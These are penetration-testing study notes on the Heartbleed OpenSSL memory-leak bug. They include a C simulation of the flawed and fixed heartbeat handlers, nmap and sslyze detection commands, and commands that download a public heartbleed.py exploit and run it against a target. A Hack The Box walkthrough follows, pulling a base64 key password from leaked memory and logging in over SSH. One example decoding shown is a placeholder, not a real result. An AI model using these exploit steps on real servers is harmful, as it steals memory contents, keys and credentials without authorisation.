Heartbleed

Basics

  • Vulnerability in the popular OpenSSL cryptographic software library.

  • Lets anyone who can reach the service read the memory of systems running a vulnerable OpenSSL version.

  • Each request leaks a chunk of the server's memory - might find all kinds of goodies!!

  • "How the heartbleed bug works"
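The bug itself, as an added illustration (not OpenSSL's code and not from the original notes): the heartbeat handler trusted the peer's 2-byte payload length and copied that many bytes back, so a short request claiming a long payload got back whatever sat in memory after it. Below, a fixed array stands in for process memory, `build_request`, `process_heartbeat_vulnerable` and `process_heartbeat_fixed` are names I chose, the "SECRET" bytes are constructed, and the fixed handler's two checks mirror the `1 + 2 + 16 > rrec.length` / `1 + 2 + payload + 16 > rrec.length` logic of the 1.0.1g fix.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated process memory. The heartbeat record is placed at the start and a
 * constructed "secret" (standing in for keys, passwords or session data that
 * happen to sit on the heap) is placed right after it. */
#define MEM_SIZE 64
static unsigned char g_memory[MEM_SIZE];

/* TLS heartbeat record layout: type (1) | payload_length (2) | payload | padding (16) */
#define HB_HEADER  3
#define HB_PADDING 16

/* Build a heartbeat request in g_memory. `claimed_len` is the length field the
 * peer sends; `payload` is what they actually send. Returns the true record
 * length (what OpenSSL sees as s->s3->rrec.length). */
static size_t build_request(uint16_t claimed_len, const char *payload)
{
    size_t plen = strlen(payload);
    if (plen > 16) return 0;                 /* keep the simulation inside g_memory */
    memset(g_memory, 0, MEM_SIZE);
    g_memory[0] = 1;                         /* TLS1_HB_REQUEST */
    g_memory[1] = (unsigned char)(claimed_len >> 8);
    g_memory[2] = (unsigned char)(claimed_len & 0xff);
    memcpy(g_memory + HB_HEADER, payload, plen);
    size_t record_len = HB_HEADER + plen + HB_PADDING;
    /* constructed secret lying in memory just past the record */
    memcpy(g_memory + record_len, "SECRET", 6);
    return record_len;
}

/* Vulnerable handler (OpenSSL 1.0.1 - 1.0.1f logic): trusts the peer's length
 * field and copies that many bytes from the record buffer, so a claimed length
 * larger than the real payload copies whatever follows it in memory.
 * Returns the number of bytes written to `out`, or -1. */
static int process_heartbeat_vulnerable(size_t record_len, unsigned char *out, size_t out_sz)
{
    (void)record_len;                        /* never consulted: that is the bug */
    uint16_t payload = (uint16_t)((g_memory[1] << 8) | g_memory[2]);
    if (payload > out_sz || payload > MEM_SIZE - HB_HEADER)
        return -1;                           /* simulation guard only, not part of the bug */
    memcpy(out, g_memory + HB_HEADER, payload);
    return (int)payload;
}

/* Fixed handler (OpenSSL 1.0.1g logic): the claimed payload plus header and
 * padding must fit inside the record actually received, otherwise discard it. */
static int process_heartbeat_fixed(size_t record_len, unsigned char *out, size_t out_sz)
{
    if (HB_HEADER + HB_PADDING > record_len)
        return -1;                           /* 1 + 2 + 16 > rrec.length */
    uint16_t payload = (uint16_t)((g_memory[1] << 8) | g_memory[2]);
    if (HB_HEADER + (size_t)payload + HB_PADDING > record_len)
        return -1;                           /* 1 + 2 + payload + 16 > rrec.length */
    if (payload > out_sz)
        return -1;
    memcpy(out, g_memory + HB_HEADER, payload);
    return (int)payload;
}

/* 1 if the vulnerable handler returns the constructed secret for a 4-byte
 * "ping" that claims to be 40 bytes long. */
int vulnerable_leaks_secret(void)
{
    unsigned char out[MEM_SIZE];
    size_t record_len = build_request(40, "ping");
    int n = process_heartbeat_vulnerable(record_len, out, sizeof out);
    /* the secret sits 16 padding bytes after the 4 real payload bytes */
    return n == 40 && memcmp(out + 4 + HB_PADDING, "SECRET", 6) == 0;
}

/* 1 if the fixed handler drops the same oversized request. */
int fixed_rejects_oversized(void)
{
    unsigned char out[MEM_SIZE];
    size_t record_len = build_request(40, "ping");
    return process_heartbeat_fixed(record_len, out, sizeof out) == -1;
}

/* 1 if the fixed handler still echoes an honest request unchanged. */
int fixed_echoes_honest_request(void)
{
    unsigned char out[MEM_SIZE];
    size_t record_len = build_request(4, "ping");
    int n = process_heartbeat_fixed(record_len, out, sizeof out);
    return n == 4 && memcmp(out, "ping", 4) == 0;
}

int main(void)
{
    printf("vulnerable leaks secret: %d\n", vulnerable_leaks_secret());
    printf("fixed rejects oversized: %d\n", fixed_rejects_oversized());
    printf("fixed echoes honest:     %d\n", fixed_echoes_honest_request());
    return 0;
}
```

The guard in the vulnerable handler only keeps this simulation from reading past its own array; real OpenSSL had no such guard, which is why a single request could return up to 64 KB of heap. The fix is a bounds check against the length the TLS layer actually received, not the length the peer claims.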

Detection

> nmap --script vuln $IP
> sslyze --heartbleed $IP

  ..nmap's dedicated check is the ssl-heartbleed NSE script; --script vuln runs the whole vuln category, so it is slower and noisier

Exploit

  • google: python heartbleed github

-----------
Download
https://gist.github.com/eelsivart/10174134#file-heartbleed-py-L8
wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
git clone https://gist.github.com/10174134.git

-----------
searchsploit -w heartbleed
https://exploit-db.com/exploits/32764

-----------
python heartbleed.py
python heartbleed.py -p 443 -n 10 $IP
./heartbleed.py $IP -n 500 -a output.txt    ..winner

-n 500  ..Number of times to connect/loop (1 = default)
-a output.txt

grep '=' output.txt                ..pick out base64-looking strings (trailing '=' padding)
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==   ..valentineHTB

Example

  • valentineHTB - had an ssh key password entered on 'decode.php'

  • hype_key was hidden somewhere else on the site :)

  • We can grab the memory, decode the key, and ssh to the box

-----------
decode.php
aGVhcnxyz==                        ..found

-----------
echo 'aGVhcnxyz==' | base64 -d     ..mysecretkey
ssh -i hype_key hype@$IP           ..connect
